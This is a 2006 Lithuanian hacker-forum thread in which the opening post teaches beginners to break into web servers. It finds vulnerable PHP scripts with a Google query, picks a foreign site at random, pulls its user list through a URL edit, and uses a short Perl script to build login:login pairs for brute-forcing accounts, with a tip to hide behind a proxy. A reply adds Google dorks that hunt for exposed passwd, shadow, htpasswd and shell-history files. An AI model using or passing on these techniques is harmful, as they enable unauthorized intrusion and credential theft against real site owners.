Lauzhimo technika.By.DarkForce

Hakeriai dalinkitės patirtimi
Skelbti atsakymą
Žinutė
Autorius
Vartotojo avataras
DF
profesionalas
profesionalas
Pranešimai:2979
Užsiregistravo:2005 08 14 10:54
Lauzhimo technika.By.DarkForce

#1 Standartinė DF » 2006 09 06 18:49

Skyletas Skriptas Web Serveryje.Lauzhimo Technika:

Taigi daugumai tai nenaujiena, bet pradzhiamoksliam bus manau toks visai vertingas tekstukas.
Pradedam:

Negaliu gyventi be google.lt todel ir pradekim nuo jos.Google galingas paieshkos resuras, todel su pastaraja galima daug ka nuveikti ir isilauzhiams, shiuo atveju su google be vargo surasi skyleta skripta web serveryje.

Isijungiam savo narshykle ir einam i :arrow:


I uzhklausos eilute ivedam tokia uzhklausa Filetype:php filename:article

Paveikslėlis

Ir spustelejam mygtuka "Ieshkoti"
Google jau po vienos akimirkos ishmes daugybe rezultatu su pazheidzhiamais skriptais, kuriuos ishnaudojas gali shita peshti :}.
Taigi ash klaidzhioju per rezultatus ir mano aki patraukia vienas Arabu puslapis.
Paveikslėlis

Taigi tuojau pat nelaukia, uzhsukam i puslapi ir shiek tiek pakoreguojam jo nuoroda.

Ish:
I:
Po shio zhingsnio, serveris, pradineme puslapio lange "ishspjaus" mums naudingos informacijos apie serveri, jai ja tiksliai panaudosim mums nusishipsos sekme :}.

Taigi mes gauname toki rezultata:

Paveikslėlis

Kuri, narsykles kamputyje paspaudus Funkcija file>save as ishsaugom *.txt fomatu i savo kompiuteri.

Esme yra tame jog perinkus login:login poras ir panaudojus jas kaip Combo list'us gali labai lengvai nubrutinti viena ish daugybes, web serverio vartotoju.O shis zhingsnis pariartins tave dar labiau prie ishsvajotoju "root teisiu" :}.

Kad perinktume login:login poras ish to isheities teksto, mums reikia pasirashyi nedideli perl skriptuka.
Siulichiau toki:
#!/usr/bin/perl

open(D,'<lol.txt');
open(R,'>lol1.txt');
while (<D>) {
($vardas,$koduotas,$uid,$gid,$cos,$home,$shell)=split(/:/);
print R "$vardas:$vardas\n";
}
close(D);
close(R);
Po ivykdito shio skripto jusu login:login poros ishsisaugos lol1.txt dokumente.
Paveikslėlis

Taigi jai viska padarete teisingai jau po 1 minutes turesite nulauzhta vartotojo varda ir password'a.Ka toliau daryti tai jau jusu reikalas.Nepamirshkite Proxy ir pasukti galveles.
Kai bobu nera - Buna blogai, Bet kai bobu yra - buna dar blogiau..Ishvadas daryk pats.

Vartotojo avataras
Dreigons
rašytojas profesionalas
rašytojas profesionalas
Pranešimai:364
Užsiregistravo:2006 01 18 13:11
Miestas:Kursenai

#2 Standartinė Dreigons » 2006 09 06 18:59

Geras toturial'ias :)
Tikrai daug kam padės. :) Tik tikėkimes, kad bus išnaudota protingai. :wink:

Vartotojo avataras
koksas
jaunasis rašytojas
jaunasis rašytojas
Pranešimai:73
Užsiregistravo:2006 09 06 16:23

#3 Standartinė koksas » 2006 09 06 19:21

kaip ta scriptuka panaudot?

MaksasMks
ultra dalyvis
ultra dalyvis
Pranešimai:590
Užsiregistravo:2005 12 30 22:20

#4 Standartinė MaksasMks » 2006 09 06 19:35

Apie lb panašų laužimosi dalyka skaičiau kažkokiam žurnale, bet lb seniai. Kad per google.lt būtų įmanoma surasti kokius lb gerus saitus su klaidom, o db visokius sh aš randu iš kuriu naudos nėra tik for fun.
Get your ambition or die trying

Vartotojo avataras
Dreigons
rašytojas profesionalas
rašytojas profesionalas
Pranešimai:364
Užsiregistravo:2006 01 18 13:11
Miestas:Kursenai

#5 Standartinė Dreigons » 2006 09 06 19:44

MaksasMks rašė:Apie lb panašų laužimosi dalyka skaičiau kažkokiam žurnale, bet lb seniai. Kad per google.lt būtų įmanoma surasti kokius lb gerus saitus su klaidom, o db visokius sh aš randu iš kuriu naudos nėra tik for fun.
Kitaip sakant mėto internetines šiukšles? :) O aš niekada nesikesinu i web for fun :)

MaksasMks
ultra dalyvis
ultra dalyvis
Pranešimai:590
Užsiregistravo:2005 12 30 22:20

#6 Standartinė MaksasMks » 2006 09 06 19:50

Kitaip sakant mėto internetines šiukšles?
Panašiai.
Get your ambition or die trying

Vartotojo avataras
DF
profesionalas
profesionalas
Pranešimai:2979
Užsiregistravo:2005 08 14 10:54

#7 Standartinė DF » 2006 09 06 20:09

MaksasMks rašė:Apie lb panašų laužimosi dalyka skaičiau kažkokiam žurnale, bet lb seniai. Kad per google.lt būtų įmanoma surasti kokius lb gerus saitus su klaidom, o db visokius sh aš randu iš kuriu naudos nėra tik for fun.
Panashus dalykas buvo parashytas Hakerio zhurnale. Tachiau chia nenaujienu ir ash toki lauzhimo buda zhinau seniai.
Kai bobu nera - Buna blogai, Bet kai bobu yra - buna dar blogiau..Ishvadas daryk pats.

MaksasMks
ultra dalyvis
ultra dalyvis
Pranešimai:590
Užsiregistravo:2005 12 30 22:20

#8 Standartinė MaksasMks » 2006 09 06 21:35

Vienaip ar kitaip pamoka lb gerai, visos aiškios pamokos gerai.
Get your ambition or die trying

Vartotojo avataras
DF
profesionalas
profesionalas
Pranešimai:2979
Užsiregistravo:2005 08 14 10:54

#9 Standartinė DF » 2006 09 06 21:51

MaksasMks rašė:Vienaip ar kitaip pamoka lb gerai, visos aiškios pamokos gerai.
Butent.
Kai bobu nera - Buna blogai, Bet kai bobu yra - buna dar blogiau..Ishvadas daryk pats.

Vartotojo avataras
zigzag
rašytojas profesionalas
rašytojas profesionalas
Pranešimai:495
Užsiregistravo:2006 04 28 17:26
Miestas:siauliai

#10 Standartinė zigzag » 2006 09 07 13:02

Dar(k)Force kokiu dar budu zinai kai nulauzti weba

Vartotojo avataras
DF
profesionalas
profesionalas
Pranešimai:2979
Užsiregistravo:2005 08 14 10:54

#11 Standartinė DF » 2006 09 07 14:02

zigzag rašė:Dar(k)Force kokiu dar budu zinai kai nulauzti weba
Priklausomai nuo aplinkybiu. Kiekvienas puslapis ar serveris turi kitokia specifika.
Kai bobu nera - Buna blogai, Bet kai bobu yra - buna dar blogiau..Ishvadas daryk pats.

Xgreem
ultra dalyvis
ultra dalyvis
Pranešimai:522
Užsiregistravo:2006 02 25 20:00

#12 Standartinė Xgreem » 2006 09 07 17:59

Pateiksiu dar kelias google uzklausas:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
intext:ZeroBoard filetype:php
intitle:phpmyadmin intext:Create new database
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
sekmes...
:roll:
linux + nessus + nmap + exploit +enter = all doors open

Vartotojo avataras
DF
profesionalas
profesionalas
Pranešimai:2979
Užsiregistravo:2005 08 14 10:54

#13 Standartinė DF » 2006 09 07 19:27

Xgreem rašė:Pateiksiu dar kelias google uzklausas:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
intext:ZeroBoard filetype:php
intitle:phpmyadmin intext:Create new database
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
sekmes...
:roll:
Chia jau kitas biesas pagal viska.
Kai bobu nera - Buna blogai, Bet kai bobu yra - buna dar blogiau..Ishvadas daryk pats.

Vartotojo avataras
Qw3rty
garbės narys
garbės narys
Pranešimai:217
Užsiregistravo:2006 04 24 21:07
Miestas:VIlnius
Susisiekti:

#14 Standartinė Qw3rty » 2006 09 07 19:36

kinda good text *16*
naujokams patiks, igivendins svajone-1st hack 8)
Paveikslėlis
Paveikslėlis
Paveikslėlis
Learning Delphi

Xgreem
ultra dalyvis
ultra dalyvis
Pranešimai:522
Užsiregistravo:2006 02 25 20:00

#15 Standartinė Xgreem » 2006 09 07 21:41

Man su ta uzklausa nei vieno link neismet... :cry:
linux + nessus + nmap + exploit +enter = all doors open

Skelbti atsakymą

Grįžti į

Dabar prisijungę

Vartotojai naršantys šį forumą: 2 ir 0 svečių